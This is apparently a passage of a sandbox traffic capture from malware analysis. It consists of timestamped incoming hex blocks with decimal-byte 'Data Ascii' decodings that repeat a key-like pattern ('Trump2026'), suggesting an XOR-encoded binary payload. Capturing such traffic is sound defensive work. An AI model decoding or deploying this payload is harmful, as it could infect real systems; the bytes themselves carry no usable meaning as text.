                    2021-10-26 16:59:45 UTC3482INData Raw: 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 38 30 20 34 38 20 34 38 20 31 31 34 20 38 37 20 38 35 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 39 20 31 30 39 20 31 32 34 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34
                    Data Ascii: 84 114 117 109 80 48 48 114 87 85 114 117 109 112 50 48 50 54 84 114 117 109 112 50 48 50 54 84 114 119 109 124 50 48 50 54 84 114 117 109 112 50 48 50 54 84 114 117 109 112 50 48 50 54 84 114 117 109 112 50 48 50 54 84 114 117 109 112 50 48 50 54 84 114
                    2021-10-26 16:59:45 UTC3484INData Raw: 38 20 33 36 20 31 36 31 20 31 38 20 32 34 36 20 38 34 20 31 31 34 20 31 31 37 20 39 34 20 31 32 32 20 35 32 20 33 39 20 31 36 33 20 32 32 20 32 35 32 20 31 31 34 20 31 31 37 20 31 30 39 20 39 34 20 34 38 20 33 38 20 32 34 20 33 33 20 31 32 36 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 35 20 32 20 35 37 20 35 30 20 31 31 35 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 36 35 20 31 20 38 34 20 31 31 34 20 31 32 37 20 31 31 36 20 39 33 20 32 36 20 32 32 20 36 35 20 31 34 20 38 34 20 31 31 34 20 31 32 37 20 31 32 32 20 39 33 20 32 30 20 32 32 20 36 35 20 31 35 20 38 34 20 31 31 34 20 31 32 37 20 31 32 33 20 39 32 20 32 32 20 32 32 20 36 35 20 31 32 20 38 34 20 31 31 34 20 31 32 37 20 32 33 37 20 31 31 36 20 35 30 20 34 38 20
                    Data Ascii: 8 36 161 18 246 84 114 117 94 122 52 39 163 22 252 114 117 109 94 48 38 24 33 126 114 117 109 115 2 57 50 115 84 114 117 109 112 50 48 65 1 84 114 127 116 93 26 22 65 14 84 114 127 122 93 20 22 65 15 84 114 127 123 92 22 22 65 12 84 114 127 237 116 50 48
                    2021-10-26 16:59:45 UTC3485INData Raw: 33 20 31 32 37 20 31 31 36 20 38 33 20 37 30 20 31 35 38 20 32 30 20 32 37 20 31 39 35 20 32 38 20 38 37 20 31 30 38 20 31 31 31 20 36 34 20 31 31 37 20 32 30 20 32 38 20 33 39 20 32 39 20 38 37 20 38 34 20 39 34 20 31 34 38 20 38 30 20 32 33 31 20 31 36 20 32 32 36 20 34 30 20 31 32 34 20 31 34 31 20 31 31 37 20 31 30 39 20 31 31 38 20 36 35 20 31 31 36 20 35 30 20 35 34 20 39 34 20 38 20 31 31 39 20 31 31 31 20 31 32 20 35 33 20 34 38 20 35 30 20 35 30 20 35 39 20 31 31 33 20 31 31 37 20 31 30 39 20 39 31 20 32 34 20 34 38 20 35 30 20 34 35 20 31 30 30 20 31 31 39 20 31 31 37 20 31 30 34 20 31 31 33 20 35 30 20 34 38 20 35 39 20 35 34 20 38 34 20 39 39 20 31 31 39 20 32 32 35 20 31 32 30 20 35 30 20 34 38 20 34 31 20 32 36 20 37 30 20 31 32 35 20 31 31
                    Data Ascii: 3 127 116 83 70 158 20 27 195 28 87 108 111 64 117 20 28 39 29 87 84 94 148 80 231 16 226 40 124 141 117 109 118 65 116 50 54 94 8 119 111 12 53 48 50 50 59 113 117 109 91 24 48 50 45 100 119 117 104 113 50 48 59 54 84 99 119 225 120 50 48 41 26 70 125 11
                    2021-10-26 16:59:45 UTC3486INData Raw: 34 33 20 31 32 35 20 31 30 39 20 31 31 32 20 34 31 20 32 36 20 32 30 20 32 39 20 31 34 30 20 38 34 20 39 34 20 31 33 39 20 38 36 20 32 35 20 31 39 33 20 33 33 20 36 20 38 30 20 31 31 34 20 31 30 34 20 31 30 39 20 31 31 32 20 35 30 20 35 39 20 35 30 20 35 34 20 36 39 20 31 31 32 20 31 30 37 20 31 31 35 20 39 33 20 33 32 20 32 32 20 34 39 20 34 35 20 36 36 20 39 34 20 31 32 32 20 37 35 20 38 38 20 39 36 20 34 38 20 35 30 20 36 30 20 31 32 34 20 33 33 20 31 31 37 20 31 30 39 20 31 32 32 20 32 34 20 32 32 20 32 35 20 32 31 38 20 31 31 34 20 38 39 20 31 35 34 20 31 30 39 20 31 31 32 20 35 30 20 33 35 20 32 20 35 33 20 38 34 20 31 32 35 20 31 31 37 20 31 30 39 20 31 31 32 20 36 32 20 34 38 20 35 30 20 33 39 20 38 36 20 31 30 36 20 39 38 20 36 34 20 31 31 39 20
                    Data Ascii: 43 125 109 112 41 26 20 29 140 84 94 139 86 25 193 33 6 80 114 104 109 112 50 59 50 54 69 112 107 115 93 32 22 49 45 66 94 122 75 88 96 48 50 60 124 33 117 109 122 24 22 25 218 114 89 154 109 112 50 35 2 53 84 125 117 109 112 62 48 50 39 86 106 98 64 119
                    2021-10-26 16:59:45 UTC3488INData Raw: 34 20 35 34 20 38 34 20 31 31 34 20 31 30 37 20 31 30 39 20 31 31 32 20 35 30 20 32 38 20 35 30 20 35 34 20 38 34 20 38 39 20 36 37 20 39 38 20 31 31 32 20 37 33 20 31 38 31 20 35 30 20 35 34 20 38 30 20 39 30 20 31 31 30 20 31 30 39 20 31 31 32 20 35 32 20 32 37 20 32 36 20 35 37 20 38 34 20 39 20 32 34 30 20 31 30 39 20 31 31 32 20 35 34 20 32 34 20 34 36 20 35 34 20 38 34 20 31 31 36 20 39 34 20 31 31 39 20 31 32 37 20 35 30 20 37 35 20 31 38 33 20 35 34 20 38 34 20 31 31 38 20 39 33 20 31 31 32 20 31 31 32 20 35 30 20 35 34 20 32 35 20 35 38 20 39 31 20 31 31 34 20 31 34 20 32 33 32 20 31 31 32 20 35 30 20 35 32 20 32 36 20 34 30 20 38 34 20 31 31 34 20 31 31 35 20 37 31 20 31 31 32 20 35 30 20 34 38 20 33 33 20 36 20 38 37 20 31 31 34 20 32 39 20 31
                    Data Ascii: 4 54 84 114 107 109 112 50 28 50 54 84 89 67 98 112 73 181 50 54 80 90 110 109 112 52 27 26 57 84 9 240 109 112 54 24 46 54 84 116 94 119 127 50 75 183 54 84 118 93 112 112 50 54 25 58 91 114 14 232 112 50 52 26 40 84 114 115 71 112 50 48 33 6 87 114 29 1
                    2021-10-26 16:59:45 UTC3489INData Raw: 35 20 32 34 39 20 35 33 20 33 39 20 38 32 20 32 35 34 20 36 31 20 31 30 39 20 31 31 32 20 35 31 20 39 35 20 31 30 35 20 35 34 20 38 34 20 31 32 30 20 39 34 20 35 39 20 39 37 20 35 34 20 37 35 20 33 32 20 35 34 20 38 34 20 31 31 38 20 31 32 35 20 36 37 20 31 32 36 20 33 35 20 35 32 20 35 38 20 37 35 20 37 30 20 31 31 34 20 31 31 37 20 31 30 35 20 31 30 33 20 31 37 38 20 35 38 20 35 30 20 35 34 20 38 30 20 39 39 20 31 31 33 20 32 32 20 31 30 30 20 35 30 20 34 38 20 35 34 20 33 39 20 38 31 20 39 30 20 34 37 20 31 30 38 20 31 31 32 20 35 32 20 32 39 20 32 38 20 34 39 20 36 39 20 31 31 36 20 32 34 39 20 33 37 20 31 31 32 20 35 30 20 34 39 20 39 33 20 31 30 39 20 38 34 20 31 31 34 20 31 32 37 20 31 32 32 20 32 34 30 20 35 39 20 34 38 20 35 30 20 35 30 20 31 31
                    Data Ascii: 5 249 53 39 82 254 61 109 112 51 95 105 54 84 120 94 59 97 54 75 32 54 84 118 125 67 126 35 52 58 75 70 114 117 105 103 178 58 50 54 80 99 113 22 100 50 48 54 39 81 90 47 108 112 52 29 28 49 69 116 249 37 112 50 49 93 109 84 114 127 122 240 59 48 50 50 11
                    2021-10-26 16:59:45 UTC3490INData Raw: 30 20 31 31 39 20 32 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 38 36 20 35 35 20 38 34 20 31 31 34 20 31 32 33 20 31 30 39 20 31 31 32 20 35 30 20 36 36 20 35 31 20 35 34 20 38 34 20 38 35 20 31 31 37 20 31 30 39 20 31 31 32 20 31 31 36 20 34 38 20 35 30 20 35 35 20 38 36 20 31 31 34 20 31 31 37 20 31 30 39 20 31 33 34 20 35 30 20 34 38 20 35 30 20 31 33 35 20 38 34 20 31 31 34 20 31 31 37 20 32 30 32 20 31 31 33 20 35 30 20 34 38 20 36 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 32 32 33 20 34 39 20 35 30 20 35 34 20 31 38 35 20 31 31 35 20 31 31 37 20 31 30 39 20 38 30 20 35 30 20 34 38 20 35 30 20 31 31
                    Data Ascii: 0 119 24 114 117 109 112 50 48 86 55 84 114 123 109 112 50 66 51 54 84 85 117 109 112 116 48 50 55 86 114 117 109 134 50 48 50 135 84 114 117 202 113 50 48 60 54 84 114 117 109 112 50 48 50 54 84 114 117 109 112 223 49 50 54 185 115 117 109 80 50 48 50 11
                    2021-10-26 16:59:45 UTC3492INData Raw: 35 34 20 31 38 38 20 35 31 20 33 38 20 38 34 20 31 31 34 20 31 31 39 20 31 30 39 20 31 35 38 20 35 30 20 32 35 20 33 37 20 35 35 20 39 30 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 33 33 20 30 20 35 38 20 35 34 20 31 31 33 20 31 31 34 20 31 31 37 20 31 30 39 20 39 39 20 35 30 20 34 38 20 33 35 20 37 32 20 32 33 20 31 31 34 20 31 31 37 20 31 30 35 20 31 30 33 20 33 37 20 33 38 20 33 37 20 31 38 37 20 33 38 20 31 31 34 20 31 31 37 20 31 30 38 20 31 30 37 20 33 31 20 33 33 20 32 30 20 34 38 20 36 36 20 31 31 32 20 32 34 39 20 37 37 20 31 31 32 20 35 30 20 34 39 20 31 34 34 20 34 38 20 31 32 34 20 31 39 36 20 31 31 37 20 31 30 39 20 31 31 38 20 32 34 20 35 38 20 32 35 20 32 31 39 20 38 34 20 31 31 34 20 31 31 37 20 36 33 20 31 34 20 31 31 33 20 34 38
                    Data Ascii: 54 188 51 38 84 114 119 109 158 50 25 37 55 90 114 117 109 112 33 0 58 54 113 114 117 109 99 50 48 35 72 23 114 117 105 103 37 38 37 187 38 114 117 108 107 31 33 20 48 66 112 249 77 112 50 49 144 48 124 196 117 109 118 24 58 25 219 84 114 117 63 14 113 48
                    2021-10-26 16:59:45 UTC3493INData Raw: 31 33 20 35 30 20 35 34 20 35 30 20 35 34 20 38 34 20 31 30 30 20 31 31 37 20 31 30 39 20 39 37 20 37 36 20 31 33 20 35 30 20 35 34 20 38 30 20 38 38 20 31 31 37 20 31 30 39 20 31 31 35 20 32 20 35 38 20 35 30 20 35 37 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 34 38 20 34 32 20 37 39 20 39 35 20 31 31 34 20 37 35 20 38 38 20 31 31 35 20 34 38 20 35 30 20 36 30 20 31 32 36 20 38 34 20 39 34 20 31 35 34 20 31 31 32 20 34 39 20 30 20 35 39 20 35 34 20 31 31 39 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 35 32 20 31 32 34 20 35 31 20 31 31 37 20 31 30 39 20 31 32 32 20 34 38 20 35 31 20 34 34 20 32 37 20 39 34 20 38 34 20 38 33 20 31 31 31 20 31 31 36 20 34 34 20 32 39 20 35 36 20 31 36 20
                    Data Ascii: 13 50 54 50 54 84 100 117 109 97 76 13 50 54 80 88 117 109 115 2 58 50 57 84 114 117 109 112 50 48 48 42 79 95 114 75 88 115 48 50 60 126 84 94 154 112 49 0 59 54 119 114 117 109 112 50 48 50 52 124 51 117 109 122 48 51 44 27 94 84 83 111 116 44 29 56 16
                    2021-10-26 16:59:45 UTC3494INData Raw: 31 34 20 31 31 33 20 36 34 20 31 31 38 20 32 35 20 35 31 20 32 30 20 32 39 20 31 36 30 20 38 38 20 31 31 39 20 31 32 33 20 31 30 31 20 33 31 20 33 34 20 32 30 20 37 37 20 37 37 20 31 31 34 20 31 31 37 20 31 30 35 20 31 31 35 20 34 36 20 34 35 20 33 31 20 36 30 20 31 31 34 20 32 39 20 32 34 20 31 30 39 20 31 31 32 20 35 36 20 32 36 20 32 30 20 32 39 20 31 38 34 20 38 34 20 39 34 20 31 35 33 20 31 31 35 20 32 20 35 38 20 35 30 20 36 20 38 34 20 31 31 34 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 34 38 20 33 32 20 37 34 20 39 35 20 31 32 37 20 37 35 20 31 31 20 34 33 20 34 38 20 35 30 20 35 30 20 31 32 31 20 31 31 36 20 39 34 20 31 31 30 20 38 36 20 32 35 20 31 39 36 20 32 34 20 35 32 20 37 36 20 31 30 37 20 38 38 20 31 32 37 20 38 36 20 37 33
                    Data Ascii: 14 113 64 118 25 51 20 29 160 88 119 123 101 31 34 20 77 77 114 117 105 115 46 45 31 60 114 29 24 109 112 56 26 20 29 184 84 94 153 115 2 58 50 6 84 114 117 109 112 50 48 48 32 74 95 127 75 11 43 48 50 50 121 116 94 110 86 25 196 24 52 76 107 88 127 86 73
                    2021-10-26 16:59:45 UTC3496INData Raw: 34 20 32 39 20 37 20 31 30 39 20 31 31 32 20 35 36 20 32 36 20 32 30 20 32 39 20 31 36 33 20 39 32 20 31 31 20 34 36 20 31 31 32 20 35 30 20 35 32 20 39 33 20 31 34 39 20 38 35 20 31 31 34 20 31 31 35 20 37 31 20 39 39 20 32 20 35 35 20 35 30 20 36 37 20 38 34 20 31 31 34 20 31 31 37 20 31 32 32 20 31 31 32 20 35 30 20 33 33 20 35 35 20 32 37 20 31 31 33 20 31 31 32 20 31 34 20 31 31 38 20 31 31 32 20 35 30 20 35 32 20 31 38 20 31 38 34 20 31 32 30 20 31 36 32 20 31 30 37 20 36 39 20 31 34 33 20 35 30 20 34 38 20 35 32 20 36 39 20 33 32 20 31 31 34 20 31 31 37 20 31 30 33 20 38 30 20 31 30 31 20 32 38 20 32 32 36 20 34 30 20 31 32 34 20 31 34 31 20 31 31 37 20 31 30 39 20 31 31 38 20 32 36 20 31 33 31 20 35 30 20 35 34 20 38 32 20 38 38 20 31 31 20 34 36
                    Data Ascii: 4 29 7 109 112 56 26 20 29 163 92 11 46 112 50 52 93 149 85 114 115 71 99 2 55 50 67 84 114 117 122 112 50 33 55 27 113 112 14 118 112 50 52 18 184 120 162 107 69 143 50 48 52 69 32 114 117 103 80 101 28 226 40 124 141 117 109 118 26 131 50 54 82 88 11 46
                    2021-10-26 16:59:45 UTC3497INData Raw: 35 36 20 32 37 20 35 30 20 34 38 20 32 31 38 20 31 39 37 20 33 31 20 31 30 35 20 31 31 39 20 31 30 37 20 32 34 20 36 39 20 35 34 20 38 34 20 31 32 30 20 32 38 20 31 32 33 20 39 32 20 33 39 20 32 32 20 35 38 20 34 38 20 36 36 20 31 32 33 20 32 36 20 32 31 20 31 31 32 20 35 30 20 35 38 20 35 33 20 36 33 20 36 32 20 34 32 20 31 32 36 20 31 30 36 20 31 31 36 20 31 20 32 33 37 20 32 35 20 35 33 20 38 39 20 38 39 20 31 35 36 20 31 30 31 20 33 31 20 37 35 20 34 38 20 35 30 20 36 30 20 31 32 36 20 31 31 34 20 31 31 37 20 31 30 39 20 31 30 37 20 32 20 35 31 20 35 30 20 31 30 34 20 38 34 20 31 31 34 20 31 31 37 20 31 31 39 20 31 31 32 20 35 30 20 33 33 20 33 32 20 35 34 20 31 37 30 20 31 30 33 20 36 34 20 31 30 39 20 31 31 32 20 34 38 20 35 30 20 36 35 20 37 36 20
                    Data Ascii: 56 27 50 48 218 197 31 105 119 107 24 69 54 84 120 28 123 92 39 22 58 48 66 123 26 21 112 50 58 53 63 62 42 126 106 116 1 237 25 53 89 89 156 101 31 75 48 50 60 126 114 117 109 107 2 51 50 104 84 114 117 119 112 50 33 32 54 170 103 64 109 112 48 50 65 76
                    2021-10-26 16:59:45 UTC3498INData Raw: 20 39 34 20 31 31 38 20 37 36 20 37 39 20 35 30 20 35 34 20 39 34 20 38 38 20 31 31 39 20 31 31 36 20 31 30 33 20 36 35 20 37 30 20 35 30 20 35 34 20 39 34 20 31 30 35 20 38 38 20 31 31 36 20 38 36 20 35 38 20 31 36 20 35 30 20 35 34 20 34 20 31 31 34 20 31 31 38 20 36 39 20 31 38 20 35 31 20 34 38 20 35 32 20 34 37 20 31 32 31 20 31 32 36 20 38 33 20 31 30 31 20 33 31 20 37 35 20 34 38 20 35 30 20 36 30 20 38 33 20 38 38 20 31 32 31 20 37 30 20 31 34 39 20 35 37 20 32 37 20 31 39 32 20 35 34 20 38 34 20 31 31 34 20 31 30 32 20 39 33 20 31 31 37 20 35 30 20 37 32 20 35 30 20 35 34 20 38 34 20 31 30 38 20 31 31 37 20 31 30 39 20 39 37 20 34 38 20 34 31 20 33 37 20 36 39 20 33 34 20 31 31 34 20 31 31 37 20 31 30 33 20 31 30 39 20 33 31 20 33 30 20 32 30 20
                    Data Ascii: 94 118 76 79 50 54 94 88 119 116 103 65 70 50 54 94 105 88 116 86 58 16 50 54 4 114 118 69 18 51 48 52 47 121 126 83 101 31 75 48 50 60 83 88 121 70 149 57 27 192 54 84 114 102 93 117 50 72 50 54 84 108 117 109 97 48 41 37 69 34 114 117 103 109 31 30 20
                    2021-10-26 16:59:45 UTC3500INData Raw: 38 20 36 32 20 35 34 20 38 34 20 39 39 20 31 31 39 20 31 31 36 20 31 30 32 20 33 30 20 35 35 20 32 30 20 37 37 20 31 31 32 20 31 31 34 20 31 31 37 20 31 30 35 20 39 30 20 32 30 20 32 37 20 31 39 37 20 35 34 20 38 37 20 36 36 20 31 32 34 20 31 30 39 20 39 32 20 35 30 20 34 38 20 35 30 20 35 34 20 38 34 20 31 31 34 20 31 31 37 20 31 31 31 20 31 31 35 20 34 34 20 32 39 20 36 32 20 31 36 20 31 31 34 20 31 31 32 20 31 34 20 37 32 20 31 31 32 20 35 30 20 35 32 20 33 30 20 34 32 20 31 32 37 20 31 31 37 20 38 20 37 33 20 31 31 32 20 35 30 20 35 32 20 32 35 20 32 31 37 20 38 36 20 39 20 38 33 20 31 30 39 20 31 31 32 20 35 34 20 33 38 20 34 38 20 37 37 20 31 31 32 20 31 31 34 20 31 31 37 20 31 30 35 20 33 31 20 31 38 31 20 34 38 20 35 30 20 36 30 20 31 31 34 20 38
                    Data Ascii: 8 62 54 84 99 119 116 102 30 55 20 77 112 114 117 105 90 20 27 197 54 87 66 124 109 92 50 48 50 54 84 114 117 111 115 44 29 62 16 114 112 14 72 112 50 52 30 42 127 117 8 73 112 50 52 25 217 86 9 83 109 112 54 38 48 77 112 114 117 105 31 181 48 50 60 114 8
                    2021-10-26 16:59:45 UTC3501INData Raw: 38 38 20 38 20 36 39 20 31 31 32 20 35 30 20 35 32 20 32 35 20 32 31 39 20 34 31 20 39 31 20 31 31 37 20 31 30 39 20 31 31 36 20 32 35 20 31 39 33 20 35 30 20 34 35 20 31 30 30 20 31 31 33 20 31 31 37 20 33 38 20 31 31 32 20 35 30 20 34 38 20 31 39 20 35 34 20 38 34 20 39 39 20 31 31 39 20 32 32 20 38 39 20 35 30 20 34 38 20 35 34 20 34 32 20 31 32 31 20 31 32 33 20 38 33 20 31 30 36 20 38 38 20 31 38 37 20 34 38 20 35 30 20 36 30 20 31 32 37 20 31 31 33 20 31 32 36 20 37 30 20 31 33 33 20 34 38 20 37 35 20 32 37 20 35 34 20 38 34 20 31 31 38 20 31 31 38 20 32 20 32 35 32 20 35 30 20 34 38 20 35 36 20 32 36 20 36 35 20 31 31 32 20 31 34 20 36 38 20 31 31 32 20 35 30 20 35 32 20 34 39 20 38 39 20 32 31 37 20 31 31 34 20 31 31 37 20 31 30 33 20 31 30 35 20
                    Data Ascii: 88 8 69 112 50 52 25 219 41 91 117 109 116 25 193 50 45 100 113 117 38 112 50 48 19 54 84 99 119 22 89 50 48 54 42 121 123 83 106 88 187 48 50 60 127 113 126 70 133 48 75 27 54 84 118 118 2 252 50 48 56 26 65 112 14 68 112 50 52 49 89 217 114 117 103 105
                    2021-10-26 16:59:45 UTC3503INData Raw: 33 20 31 31 34 20 31 31 37 20 31 30 39 20 38 33 20 35 30 20 34 38 20 33 35 20 35 32 20 34 37 20 39 31 20 31 31 37 20 31 30 39 20 31 31 36 20 34 32 20 32 39 20 35 39 20 31 36 20 38 33 20 39 30 20 32 35 32 20 31 30 39 20 31 31 32 20 35 36 20 32 37 20 34 39 20 36 31 20 31 32 37 20 31 33 35 20 31 31 39 20 32 32 20 38 39 20 35 30 20 34 38 20 35 34 20 35 33 20 35 39 20 32 35 34 20 31 31 37 20 31 30 39 20 31 32 32 20 34 36 20 32 39 20 34 39 20 31 36 20 31 33 38 20 31 32 30 20 31 32 37 20 37 30 20 31 33 39 20 35 33 20 32 34 20 31 38 34 20 35 34 20 38 34 20 31 32 30 20 31 36 39 20 31 30 37 20 39 30 20 35 36 20 34 39 20 33 34 20 35 34 20 38 34 20 31 31 32 20 31 31 37 20 31 32 30 20 31 31 32 20 33 39 20 32 36 20 35 30 20 34 39 20 38 34 20 31 31 34 20 31 31 37 20 31
                    Data Ascii: 3 114 117 109 83 50 48 35 52 47 91 117 109 116 42 29 59 16 83 90 252 109 112 56 27 49 61 127 135 119 22 89 50 48 54 53 59 254 117 109 122 46 29 49 16 138 120 127 70 139 53 24 184 54 84 120 169 107 90 56 49 34 54 84 112 117 120 112 39 26 50 49 84 114 117 1
                    2021-10-26 16:59:45 UTC3504INData Raw: 32 32 20 36 35 20 31 34 37 20 38 34 20 31 31 34 20 31 32 37 20 31 31 37 20 39 33 20 33 30 20 32 32 20 36 35 20 31 38 39 20 38 34 20 31 31 34 20 31 32 37 20 32 33 37 20 36 36 20 35 30 20 34 38 20 35 34 20 33 30 20 32 34 32 20 31 31 34 20 31 31 37 20 31 30 33 20 38 38 20 31 34 39 20 34 38 20 35 30 20 36 30 20 31 32 34 20 32 35 20 31 31 37 20 31 30 39 20 31 31 38 20 33 31 20 34 34 20 32 35 20 33 35 20 32 31 32 20 35 36 20 31 31 37 20 31 30 39 20 31 31 36 20 32 35 20 32 35 30 20 31 37 38 20 32 38 20 38 34 20 31 31 34 20 31 31 33 20 37 30 20 31 38 38 20 31 37 38 20 32 38 20 35 30 20 35 34 20 38 30 20 38 39 20 31 38 37 20 36 39 20 33 31 20 35 30 20 34 38 20 35 32 20 33 30 20 33 38 20 31 31 34 20 31 31 37 20 31 30 37 20 38 38 20 36 35 20 34 38 20 35 30 20 34 38
                    Data Ascii: 22 65 147 84 114 127 117 93 30 22 65 189 84 114 127 237 66 50 48 54 30 242 114 117 103 88 149 48 50 60 124 25 117 109 118 31 44 25 35 212 56 117 109 116 25 250 178 28 84 114 113 70 188 178 28 50 54 80 89 187 69 31 50 48 52 30 38 114 117 107 88 65 48 50 48
                    2021-10-26 16:59:45 UTC3505INData Raw: 31 35 32 20 35 30 20 35 34 20 39 34 20 39 30 20 36 38 20 31 30 38 20 31 31 32 20 35 32 20 39 35 20 31 35 35 20 35 34 20 38 34 20 31 32 30 20 39 33 20 31 39 37 20 31 31 32 20 35 30 20 35 38 20 31 37 38 20 37 32 20 38 34 20 31 31 34 20 31 31 33 20 31 39 20 31 33 20 35 30 20 34 38 20 35 34 20 33 30 20 32 31 33 20 31 31 34 20 31 31 37 20 31 30 37 20 32 34 30 20 37 32 20 34 38 20 35 30 20 35 30 20 31 32 34 20 32 31 36 20 31 31 37 20 31 30 39 20 31 32 32 20 39 33 20 31 35 35 20 35 30 20 35 34 20 39 34 20 32 39 20 32 31 37 20 31 30 39 20 31 31 32 20 35 36 20 34 33 20 32 30 34 20 35 32 20 32 31 32 20 31 34 20 31 31 37 20 31 30 39 20 31 31 36 20 37 36 20 37 33 20 35 30 20 35 34 20 38 30 20 39 30 20 31 30 38 20 31 30 38 20 31 31 32 20 35 32 20 35 38 20 33 32 20 35
                    Data Ascii: 152 50 54 94 90 68 108 112 52 95 155 54 84 120 93 197 112 50 58 178 72 84 114 113 19 13 50 48 54 30 213 114 117 107 240 72 48 50 50 124 216 117 109 122 93 155 50 54 94 29 217 109 112 56 43 204 52 212 14 117 109 116 76 73 50 54 80 90 108 108 112 52 58 32 5
                    2021-10-26 16:59:45 UTC3507INData Raw: 32 36 20 36 37 20 31 30 37 20 35 34 20 38 34 20 31 32 30 20 31 32 30 20 31 39 20 39 32 20 35 30 20 34 38 20 35 34 20 38 39 20 32 32 38 20 31 31 34 20 31 31 37 20 31 30 33 20 39 39 20 35 36 20 32 37 20 32 37 20 33 36 20 39 34 20 39 30 20 31 39 36 20 31 30 39 20 31 31 32 20 35 36 20 33 35 20 35 35 20 37 32 20 31 32 36 20 31 31 34 20 31 31 37 20 31 30 35 20 39 38 20 35 35 20 32 34 20 31 32 38 20 35 34 20 38 34 20 31 32 30 20 32 36 20 31 33 20 31 31 32 20 35 30 20 35 38 20 33 31 20 35 39 20 39 33 20 39 36 20 31 31 32 20 36 39 20 31 39 34 20 35 30 20 34 38 20 35 36 20 38 39 20 31 34 20 31 31 34 20 31 31 37 20 31 30 33 20 39 38 20 35 36 20 32 34 20 31 32 39 20 35 34 20 38 34 20 31 32 30 20 38 38 20 31 36 33 20 31 37 34 20 36 30 20 33 34 20 35 36 20 32 30 30 20
                    Data Ascii: 26 67 107 54 84 120 120 19 92 50 48 54 89 228 114 117 103 99 56 27 27 36 94 90 196 109 112 56 35 55 72 126 114 117 105 98 55 24 128 54 84 120 26 13 112 50 58 31 59 93 96 112 69 194 50 48 56 89 14 114 117 103 98 56 24 129 54 84 120 88 163 174 60 34 56 200
                    2021-10-26 16:59:45 UTC3508INData Raw: 36 39 20 31 30 34 20 31 31 32 20 31 35 33 20 34 39 20 35 30 20 35 34 20 31 32 36 20 31 31 34 20 31 31 37 20 31 32 34 20 31 34 20 37 39 20 34 38 20 35 30 20 35 30 20 31 31 36 20 38 36 20 38 35 20 31 38 39 20 31 31 30 20 32 36 20 32 30 37 20 35 30 20 35 34 20 38 32 20 39 30 20 32 32 31 20 31 30 39 20 31 31 32 20 35 36 20 33 39 20 33 31 20 36 31 20 31 31 34 20 31 31 36 20 39 33 20 31 39 35 20 31 31 32 20 35 30 20 35 38 20 33 31 20 34 38 20 31 32 37 20 31 31 33 20 31 32 37 20 37 30 20 31 33 31 20 32 34 20 35 34 20 32 36 20 31 35 33 20 38 34 20 31 31 34 20 31 32 37 20 31 31 35 20 39 33 20 33 30 20 32 32 20 35 33 20 33 30 20 31 32 37 20 31 31 35 20 31 31 37 20 31 30 37 20 31 31 30 20 33 31 20 32 31 20 32 30 20 36 33 20 36 36 20 32 33 32 20 31 32 20 39 35 20 31
                    Data Ascii: 69 104 112 153 49 50 54 126 114 117 124 14 79 48 50 50 116 86 85 189 110 26 207 50 54 82 90 221 109 112 56 39 31 61 114 116 93 195 112 50 58 31 48 127 113 127 70 131 24 54 26 153 84 114 127 115 93 30 22 53 30 127 115 117 107 110 31 21 20 63 66 232 12 95 1
                    2021-10-26 16:59:45 UTC3509INData Raw: 39 20 36 30 20 35 30 20 34 38 20 35 36 20 33 37 20 38 32 20 39 39 20 31 31 35 20 37 37 20 31 36 36 20 31 39 20 32 32 34 20 34 34 20 33 30 20 31 37 31 20 31 31 34 20 31 31 37 20 31 30 37 20 38 38 20 31 33 34 20 34 38 20 35 30 20 34 38 20 31 32 34 20 31 39 20 31 31 37 20 31 30 39 20 31 32 32 20 32 33 36 20 34 38 20 32 34 20 35 36 20 32 31 20 31 31 30 20 31 31 37 20 31 30 39 20 31 31 32 20 35 30 20 34 38 20 35 30 20 31 36 20 38 34 20 31 31 34 20 31 31 37 20 39 20 31 31 33 20 35 30 20 34 38 20 31 38 34 20 35 35 20 38 34 20 31 31 34 20 38 35 20 31 30 39 20 31 31 32 20 35 30 20 31 31 38 20 35 30 20 35 34 20 38 35 20 31 30 35 20 36 39 20 31 31 30 20 31 31 32 20 31 39 39 20 34 38 20 35 30 20 35 34 20 31 32 37 20 31 31 34 20 31 31 37 20 31 32 34 20 31 34 20 37 39
                    Data Ascii: 9 60 50 48 56 37 82 99 115 77 166 19 224 44 30 171 114 117 107 88 134 48 50 48 124 19 117 109 122 236 48 24 56 21 110 117 109 112 50 48 50 16 84 114 117 9 113 50 48 184 55 84 114 85 109 112 50 118 50 54 85 105 69 110 112 199 48 50 54 127 114 117 124 14 79
